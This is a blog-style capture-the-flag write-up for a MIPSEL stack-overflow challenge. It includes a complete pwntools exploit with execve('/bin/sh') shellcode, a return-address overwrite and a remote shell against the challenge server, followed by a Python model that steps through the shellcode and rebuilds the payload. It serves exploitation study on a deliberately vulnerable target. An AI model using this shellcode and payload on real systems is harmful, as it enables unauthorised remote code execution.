Add

nc pwn2.jarvisoj.com 9889


Challenge source: UCTF2016




add.1f54e2c8b9396f83a4be2632bcb3a5f5


A 32-bit MIPSEL (little-endian MIPS) stack overflow.

When a particular number is entered, the program echoes a stack address: the address of the input buffer.

Write shellcode into that buffer and overwrite the saved return address with its location, so that the function returns into the shellcode.

Exploit:

from pwn import *

# Local run under qemu-user (needs the mipsel sysroot); swap the two lines to use it.
#io = process(['qemu-mipsel', '-L', '/usr/mipsel-linux-gnu/', './add'])
io = remote('pwn2.jarvisoj.com', 9889)

# Entering this value makes the program print the address of the input buffer.
challenge = 2057561479

io.sendline(str(challenge))
io.recvuntil('Your input was ')
buf_addr = int(io.recvline().strip(), 16)
info("buf_addr: " + hex(buf_addr))

# MIPSEL execve("/bin/sh", ["/bin/sh", NULL], NULL): 48 bytes of code followed by
# the string. The code finds "/bin/sh" relative to $ra (set by the leading bltzal),
# so the string must stay contiguous with the code, 0x30 bytes after its start.
shellcode = b"\xff\xff\x10\x04\xab\x0f\x02\x24"
shellcode += b"\x55\xf0\x46\x20\x66\x06\xff\x23"
shellcode += b"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
shellcode += b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
shellcode += b"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
shellcode += b"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
shellcode += b"/bin/sh\0"

# Layout: 8 bytes of padding, shellcode, zero fill up to the saved return address
# at offset 0x70, then the new return address = start of the shellcode (buf + 8).
payload = b'a' * 8 + shellcode
payload = payload.ljust(0x70, b'\x00')
payload += p32(buf_addr + 8)
io.sendline(payload)

# The overwritten $ra is only used when the vulnerable function returns,
# which "exit" triggers.
sleep(0.5)
io.sendline("exit")

io.interactive()
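To see why the exploit returns to buf_addr + 8 and why "/bin/sh" must sit exactly 0x30 bytes after the first instruction, here is an added example (not part of the original write-up) that decodes the shellcode, steps it through a minimal register/memory model and rebuilds the payload layout. The shellcode bytes and the offsets 8 and 0x70 come from the exploit above; the MIPS32 field decoding, the o32 execve number 4011, the initial $sp and the sample leaked address 0x7fff0000 are the example's own assumptions.

```python
import struct

# Shellcode bytes copied from the exploit above: MIPSEL execve("/bin/sh").
SHELLCODE = (
    b"\xff\xff\x10\x04\xab\x0f\x02\x24"
    b"\x55\xf0\x46\x20\x66\x06\xff\x23"
    b"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
    b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
    b"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
    b"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
    b"/bin/sh\0"
)
SYS_EXECVE = 4011   # o32 syscall number for execve on MIPS Linux (assumed)
NUM_INSNS = 12      # 48 bytes of code; "/bin/sh" follows at offset 0x30
PAD = 8             # bytes placed before the shellcode, as in the exploit
RET_OFFSET = 0x70   # distance from the buffer start to the saved $ra
SP, A0, A1, A2, V0, RA = 29, 4, 5, 6, 2, 31


def sext16(imm):
    """Sign-extend a 16-bit immediate."""
    return imm - 0x10000 if imm & 0x8000 else imm


def decode(word):
    """Decode only the six MIPS32 instruction forms the shellcode uses."""
    op, funct = word >> 26, word & 0x3f
    rs, rt, rd = (word >> 21) & 0x1f, (word >> 16) & 0x1f, (word >> 11) & 0x1f
    imm = sext16(word & 0xffff)
    if op == 0 and funct == 0x21:
        return "addu", (rd, rs, rt)
    if op == 0 and funct == 0x0c:
        return "syscall", ()
    if op == 1 and rt == 0x10:
        return "bltzal", (rs, imm)
    if op in (0x08, 0x09):
        return ("addi", "addiu")[op - 8], (rt, rs, imm)
    if op == 0x2b:
        return "sw", (rt, rs, imm)
    raise ValueError("unsupported instruction 0x%08x" % word)


def dry_run(code, base, sp=0x7ffff000):
    """Step the code at address `base` through a minimal register/memory model
    and return the execve arguments as the kernel would see them."""
    regs = [0] * 32
    regs[SP] = sp          # constructed stack pointer; any 32-bit value works
    mem = {}
    pc = base
    for word in struct.unpack("<%dI" % NUM_INSNS, code[:4 * NUM_INSNS]):
        mnem, ops = decode(word)
        if mnem == "bltzal":
            # $zero < 0 is never true, so no branch is taken, but bltzal
            # always writes the link register: $ra = address of this insn + 8.
            regs[RA] = pc + 8
        elif mnem in ("addi", "addiu"):
            rt, rs, imm = ops
            regs[rt] = (regs[rs] + imm) & 0xffffffff
        elif mnem == "addu":
            rd, rs, rt = ops
            regs[rd] = (regs[rs] + regs[rt]) & 0xffffffff
        elif mnem == "sw":
            rt, rs, imm = ops
            mem[(regs[rs] + imm) & 0xffffffff] = regs[rt]
        else:  # syscall: read execve(path, argv, envp) out of the model
            a0, a1 = regs[A0], regs[A1]
            path = None
            if base <= a0 < base + len(code):
                path = code[a0 - base:].split(b"\0", 1)[0]
            return {"nr": regs[V0], "path": path, "path_addr": a0,
                    "argv": [mem.get(a1), mem.get(a1 + 4)], "envp": regs[A2]}
        pc += 4
    raise RuntimeError("no syscall reached")


def build_payload(buf_addr, shellcode=SHELLCODE):
    """Lay out the overflow exactly as the exploit does: padding, shellcode,
    zero fill up to the saved $ra, then the address of the shellcode."""
    ret = buf_addr + PAD
    body = b"a" * PAD + shellcode
    if len(body) > RET_OFFSET:
        raise ValueError("shellcode would overwrite the saved return address")
    return body.ljust(RET_OFFSET, b"\0") + struct.pack("<I", ret), ret


def check_payload(buf_addr):
    """Simulate the ret into buf_addr + 8 and report what execve receives."""
    payload, ret = build_payload(buf_addr)
    return dry_run(payload[ret - buf_addr:], base=ret)


if __name__ == "__main__":
    # Constructed leak value standing in for the address the service prints.
    print(check_payload(0x7fff0000))
```

The model shows the whole chain: the leading bltzal never branches but loads $ra with the shellcode address plus 8, the two addi instructions turn that into a pointer to the string at offset 0x30, argv is built on the stack as [that pointer, NULL], and the syscall fires with $v0 = 4011. Because the string address is computed from $ra, any gap inserted between the code and "/bin/sh" (or a return address other than the first instruction) breaks the exploit even though the code itself would still run.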


posted @ 2021-07-18 17:35  hktk1643  views (253)  comments (0)